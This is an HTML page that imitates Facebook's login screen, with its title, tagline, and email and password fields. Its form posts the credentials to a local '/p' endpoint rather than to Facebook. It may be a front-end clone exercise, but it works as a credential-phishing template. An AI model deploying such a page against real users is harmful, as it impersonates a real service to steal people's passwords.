<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE-edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css"/>
    
    <title>Facebook-log in or sign up</title>
</head>
<body>
    <main id="m1">
        <div id="dmain">
            <div id="d1"></div>
            <div id="d2">
                <p>Facebook helps you connect and share</p>
                <p>with the people in your life.</p>
            </div>
        </div>    
        <form method="post" action="/p">
           
            <input id="inp1" type="text" name="name" placeholder="Email address or phone number"/>
            <input id="inp2" type="password" name="password" placeholder="Password"/>
            <button id="btn1" type="submit">Log in</button>
            <p id="p">Forgotten password?</p>
        <hr>
            <button id="btn2" type="submit">Create new account</button>
        
        </form>
    </main>
</body>
<script src="index.js"></script>
</html>

